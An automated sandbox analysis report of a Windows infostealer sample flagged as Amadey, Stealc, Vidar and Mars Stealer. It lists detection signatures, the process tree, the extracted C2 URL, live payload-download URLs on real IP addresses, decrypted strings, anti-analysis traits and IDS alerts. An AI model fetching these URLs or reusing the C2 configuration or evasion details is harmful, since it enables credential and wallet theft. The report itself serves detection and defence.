Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wqmnYoVbHr.exe

Overview

General Information

Sample name:wqmnYoVbHr.exe
renamed because original name is a hash value
Original sample name:278754c8f6050d4bbf4d9a243f048429.exe
Analysis ID:1463419
MD5:278754c8f6050d4bbf4d9a243f048429
SHA1:7f5fea45aece28601ef66caa6d2174cd1657d60e
SHA256:d2105345952320d956616ccf74f73024420f7619f745c5c1e06a272bcd7199dc
Tags:32exetrojan
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • wqmnYoVbHr.exe (PID: 2308 cmdline: "C:\Users\user\Desktop\wqmnYoVbHr.exe" MD5: 278754C8F6050D4BBF4D9A243F048429)
    • cmd.exe (PID: 4976 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AFHDAKJKFC.exe (PID: 4876 cmdline: "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe" MD5: EBD6A9BB1E8E1C7357A9426791B6D14F)
        • explortu.exe (PID: 4632 cmdline: "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" MD5: EBD6A9BB1E8E1C7357A9426791B6D14F)
    • cmd.exe (PID: 5696 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHCBAAAFHJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explortu.exe (PID: 6892 cmdline: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe MD5: EBD6A9BB1E8E1C7357A9426791B6D14F)
    • cb41bc9329.exe (PID: 6184 cmdline: "C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe" MD5: 278754C8F6050D4BBF4D9A243F048429)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
{"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2394465474.00000000005C1000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
          0000000E.00000002.2784688006.0000000001BB4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            0000000A.00000003.2372578172.0000000004C30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              Click to see the 10 entries
              SourceRuleDescriptionAuthorStrings
              10.2.explortu.exe.450000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                8.2.AFHDAKJKFC.exe.5c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0.2.wqmnYoVbHr.exe.580000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.2.wqmnYoVbHr.exe.580000.0.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                      14.2.cb41bc9329.exe.720000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        Click to see the 1 entries
                        No Sigma rule has matched
                        Timestamp:06/27/24-05:58:03.474682
                        SID:2051831
                        Source Port:80
                        Destination Port:49711
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:06/27/24-05:58:03.290802
                        SID:2044246
                        Source Port:49711
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:06/27/24-05:59:03.185730
                        SID:2856147
                        Source Port:49728
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:06/27/24-05:58:02.458744
                        SID:2044243
                        Source Port:49711
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:06/27/24-05:58:03.113550
                        SID:2044244
                        Source Port:49711
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:06/27/24-05:58:03.289502
                        SID:2051828
                        Source Port:80
                        Destination Port:49711
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:06/27/24-05:59:04.072777
                        SID:2856122
                        Source Port:80
                        Destination Port:49728
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: wqmnYoVbHr.exeAvira: detected
                        Source: http://77.91.77.81/mine/amadka.exeAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exeAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/XAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllkAvira URL Cloud: Label: malware
                        Source: http://147.45.47.155/ku4Nor9/index.phpAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/nss3.dll5Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/tAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllWAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.php8LAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/mozglue.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/nss3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.phpDAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllMAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/mine/amadka.exe00Avira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.phpAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.phpUAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exe00Avira URL Cloud: Label: phishing
                        Source: http://77.91.77.81/mine/amadka.exeperaAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllkAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.phprAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exeAppDataAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllSAvira URL Cloud: Label: malware
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
                        Source: http://77.91.77.81/mine/amadka.exeVirustotal: Detection: 27%Perma Link
                        Source: http://77.91.77.81/cost/go.exeVirustotal: Detection: 26%Perma Link
                        Source: http://85.28.47.4/Virustotal: Detection: 14%Perma Link
                        Source: http://147.45.47.155/ku4Nor9/index.phpVirustotal: Detection: 21%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/mozglue.dllVirustotal: Detection: 7%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllVirustotal: Detection: 7%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllVirustotal: Detection: 6%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/nss3.dllVirustotal: Detection: 9%Perma Link
                        Source: http://77.91.77.81/mine/amadka.exe00Virustotal: Detection: 25%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllVirustotal: Detection: 6%Perma Link
                        Source: http://85.28.47.4/920475a59bac849d.phpDVirustotal: Detection: 13%Perma Link
                        Source: http://85.28.47.4/920475a59bac849d.phpVirustotal: Detection: 18%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllVirustotal: Detection: 21%Perma Link
                        Source: http://77.91.77.81/cost/go.exe00Virustotal: Detection: 25%Perma Link
                        Source: http://85.28.47.4Virustotal: Detection: 14%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dllVirustotal: Detection: 9%Perma Link
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeReversingLabs: Detection: 52%
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeReversingLabs: Detection: 52%
                        Source: wqmnYoVbHr.exeReversingLabs: Detection: 52%
                        Source: wqmnYoVbHr.exeVirustotal: Detection: 43%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeJoe Sandbox ML: detected
                        Source: wqmnYoVbHr.exeJoe Sandbox ML: detected
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: INSERT_KEY_HERE
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetProcAddress
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: LoadLibraryA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: lstrcatA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: OpenEventA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: CreateEventA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: CloseHandle
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: Sleep
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetUserDefaultLangID
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: VirtualAllocExNuma
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: VirtualFree
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetSystemInfo
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: VirtualAlloc
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: HeapAlloc
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetComputerNameA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: lstrcpyA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetProcessHeap
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetCurrentProcess
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: lstrlenA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: ExitProcess
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GlobalMemoryStatusEx
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetSystemTime
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: SystemTimeToFileTime
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: advapi32.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: gdi32.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: user32.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: crypt32.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: ntdll.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetUserNameA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: CreateDCA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetDeviceCaps
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: ReleaseDC
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: CryptStringToBinaryA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: sscanf
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: VMwareVMware
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: HAL9TH
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: JohnDoe
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: DISPLAY
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: %hu/%hu/%hu
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: http://85.28.47.4
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: /920475a59bac849d.php
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: /69934896f997d5bb/
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: default
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetEnvironmentVariableA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetFileAttributesA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GlobalLock
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: HeapFree
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetFileSize
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GlobalSize
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: CreateToolhelp32Snapshot
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: IsWow64Process
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: Process32Next
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetLocalTime
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: FreeLibrary
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetTimeZoneInformation
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetSystemPowerStatus
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetVolumeInformationA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetWindowsDirectoryA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: Process32First
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetLocaleInfoA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetUserDefaultLocaleName
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetModuleFileNameA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: DeleteFileA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: FindNextFileA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: LocalFree
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: FindClose
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: SetEnvironmentVariableA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: LocalAlloc
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetFileSizeEx
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: ReadFile
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: SetFilePointer
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: WriteFile
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: CreateFileA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: FindFirstFileA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: CopyFileA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: VirtualProtect
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetLastError
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: lstrcpynA
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: MultiByteToWideChar
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GlobalFree
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: WideCharToMultiByte
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GlobalAlloc
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: OpenProcess
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: TerminateProcess
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: GetCurrentProcessId
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: gdiplus.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: ole32.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: bcrypt.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: wininet.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: shlwapi.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: shell32.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: psapi.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: rstrtmgr.dll
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: CreateCompatibleBitmap
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: SelectObject
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: BitBlt
                        Source: 0.2.wqmnYoVbHr.exe.580000.0.unpackString decryptor: DeleteObject
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6C8D6C80
                        Source: wqmnYoVbHr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Binary string: mozglue.pdbP source: wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: nss3.pdb@ source: wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                        Source: Binary string: nss3.pdb source: wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: mozglue.pdb source: wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49711 -> 85.28.47.4:80
                        Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49711 -> 85.28.47.4:80
                        Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.6:49711
                        Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49711 -> 85.28.47.4:80
                        Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.6:49711
                        Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:49728 -> 147.45.47.155:80
                        Source: TrafficSnort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 147.45.47.155:80 -> 192.168.2.6:49728
                        Source: Malware configuration extractorURLs: http://85.28.47.4/920475a59bac849d.php
                        Source: Malware configuration extractorURLs: http://85.28.47.4/920475a59bac849d.php
